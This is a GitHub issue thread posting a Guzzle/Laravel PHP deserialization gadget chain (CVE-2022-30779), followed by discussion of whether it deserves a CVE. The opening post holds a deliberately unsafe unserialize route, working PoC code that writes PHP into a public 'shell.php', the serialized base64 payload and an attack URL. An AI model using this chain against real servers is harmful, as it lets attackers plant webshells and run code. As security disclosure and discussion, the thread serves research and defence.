search

1nhann / vulns

31 stars 4 forks source link

Laravel 9.1.8 POP chain2 #2

Open 1nhann opened 2 years ago

1nhann commented 2 years ago

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30779

build a route to test:

routes/web.php

<?php

use Illuminate\Support\Facades\Route;

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/

Route::get('/', function (\Illuminate\Http\Request $request) {
//    return view('welcome');
    $ser = base64_decode($request->input("ser"));
    unserialize($ser);
    return "ok";
});

poc

<?php

namespace GuzzleHttp\Cookie{
    class SetCookie
    {
        private static $defaults = [
            'Name'     => null,
            'Value'    => null,
            'Domain'   => null,
            'Path'     => '/',
            'Max-Age'  => null,
            'Expires'  => null,
            'Secure'   => false,
            'Discard'  => false,
            'HttpOnly' => false
        ];
        function __construct()
        {
            $this->data['Expires'] = '<?php phpinfo();?>';
            $this->data['Discard'] = 0;
        }
    }
    class CookieJar{
        private $cookies = [];
        private $strictMode;
        function __construct()
        {
            $this->cookies[] = new SetCookie();
        }
    }
    class FileCookieJar extends CookieJar{
        private $filename;
        private $storeSessionCookies;
        function __construct()
        {
            parent::__construct();
            $this->filename = "d:/var/www/untitled/public/shell.php";
            $this->storeSessionCookies = true;
        }
    }
}
namespace{
    $a = new \GuzzleHttp\Cookie\FileCookieJar();
    echo base64_encode(serialize($a));
}

result :

TzozMToiR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUphciI6NDp7czo0MToiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAZmlsZW5hbWUiO3M6MzY6ImQ6L3Zhci93d3cvdW50aXRsZWQvcHVibGljL3NoZWxsLnBocCI7czo1MjoiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAc3RvcmVTZXNzaW9uQ29va2llcyI7YjoxO3M6MzY6IgBHdXp6bGVIdHRwXENvb2tpZVxDb29raWVKYXIAY29va2llcyI7YToxOntpOjA7TzoyNzoiR3V6emxlSHR0cFxDb29raWVcU2V0Q29va2llIjoxOntzOjQ6ImRhdGEiO2E6Mjp7czo3OiJFeHBpcmVzIjtzOjE4OiI8P3BocCBwaHBpbmZvKCk7Pz4iO3M6NzoiRGlzY2FyZCI7aTowO319fXM6Mzk6IgBHdXp6bGVIdHRwXENvb2tpZVxDb29raWVKYXIAc3RyaWN0TW9kZSI7Tjt9

attack

http://127.0.0.1:1080/?ser=TzozMToiR3V6emxlSHR0cFxDb29raWVcRmlsZUNvb2tpZUphciI6NDp7czo0MToiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAZmlsZW5hbWUiO3M6MzY6ImQ6L3Zhci93d3cvdW50aXRsZWQvcHVibGljL3NoZWxsLnBocCI7czo1MjoiAEd1enpsZUh0dHBcQ29va2llXEZpbGVDb29raWVKYXIAc3RvcmVTZXNzaW9uQ29va2llcyI7YjoxO3M6MzY6IgBHdXp6bGVIdHRwXENvb2tpZVxDb29raWVKYXIAY29va2llcyI7YToxOntpOjA7TzoyNzoiR3V6emxlSHR0cFxDb29raWVcU2V0Q29va2llIjoxOntzOjQ6ImRhdGEiO2E6Mjp7czo3OiJFeHBpcmVzIjtzOjE4OiI8P3BocCBwaHBpbmZvKCk7Pz4iO3M6NzoiRGlzY2FyZCI7aTowO319fXM6Mzk6IgBHdXp6bGVIdHRwXENvb2tpZVxDb29raWVKYXIAc3RyaWN0TW9kZSI7Tjt9

image-20220513154945425

GlitchWitch commented 2 years ago

Tested and confirmed working on Laravel v9.12.2 (PHP v8.1.5).

Peek 2022-05-17 16-39

mir-hossein commented 2 years ago

Hi!

Thank you @1nhann @GlitchWitch for sharing this,

This is a guzzle POP chain (file write) and has been public for years. For example: https://github.com/ambionics/phpggc/commit/911dbb541233de733134caed872f4cc9fc9efd71#diff-440f971a668a7be90201d1ee799993d495af0eb2673c7fde1b58918bcf019fa4 in 2017.

In any software that uses Guzzle, you can use this chain to write a file, and It's not limited to Laravel. (Object Injection using the unserialize function or PHAR deserialization in PHP<8 is required.)

You can test it in https://github.com/ambionics/phpggc/ Please try Guzzle/FW1 https://github.com/ambionics/phpggc/blob/master/gadgetchains/Guzzle/FW/1/gadgets.php

I don't know why @CVEProject assigned a CVE for a chain because it's NOT a vulnerability.

Thank you.

1nhann commented 2 years ago

Hi!

Thank you @1nhann @GlitchWitch for sharing this,

This is a guzzle POP chain (file write) and has been public for years. For example: ambionics/phpggc@911dbb5#diff-440f971a668a7be90201d1ee799993d495af0eb2673c7fde1b58918bcf019fa4 in 2017.

In any software that uses Guzzle, you can use this chain to write a file, and It's not limited to Laravel. (Object Injection using the unserialize function or PHAR deserialization in PHP<8 is required.)

You can test it in https://github.com/ambionics/phpggc/ Please try Guzzle/FW1 https://github.com/ambionics/phpggc/blob/master/gadgetchains/Guzzle/FW/1/gadgets.php

I don't know why @CVEProject assigned a CVE for a chain because it's NOT a vulnerability.

Thank you.

I did not check whether the pop chain I built is exsiting or not before I posted it , because I thought the latest Laravel should have fixed all the potential vulnerabilities of unserializing , that is pop chains those were found before should not work in the latest Laravel , and what I built should be a new one. So it is really a mistake , and I am really sorry . So if the cve will not be revoked , then it should not be credited to me.

darakian commented 2 years ago

@1nhann, if you requested the CVE for this issue you should contact Mitre and ask for it to be revoked. Thank you for acknowledging that this is not a vulnerability 👍

mir-hossein commented 2 years ago

It seems the NVD has assigned a critical severity to this POP chain (5/24/2022). CVSS3.1: 9.8/10 link

Also, it's NOT the first time that MITRE assigns a CVE for a chain, Example: CVE-2021-43503

I think documenting these types of security risks is very good, but assigning a CVE to them is NOT a good idea.

Maybe @cve-team or @darakian (Github security team) will find another way to document it, something like SRE-2022-????? (Security Risk Enumeration) or EF-2022-????? (Exploitation Facilitator) to have a dictionary of potential security risks and inform users about them.

There are other security risks in famous packages/libraries that users use, but are unaware of the risks (I don't mean POP chains only). A dictionary will help (I think).

Thank you.

darakian commented 2 years ago

@mir-hossein we (github) can't change the CVE, but we are omitting this from our advisory database to keep the noise down. To get this changed outside of github the CVE itself will need to be revoked and/or marked as disputed.

To revoke the requestor ( @1nhann I think) should reach out to Mitre, inform them that the CVE was requested erroneously and ask that it be revoked.

To get this disputed the laravel folks will need to get involved, contact mitre, and to inform them that the vulnerability does not affect the project.

mir-hossein commented 2 years ago

@darakian Thank you!

arijgr commented 2 years ago

Hello !, Is this vulnerability fixed yet and does it only concern the 9.1.8 laravel version ?

mir-hossein commented 2 years ago

Hello !, Is this vulnerability fixed yet and does it only concern the 9.1.8 laravel version ?

Hello @arijgr, This isn't a vulnerability, just a GC. If you don't use the unserialize function (with user-controlled input), don't worry about it.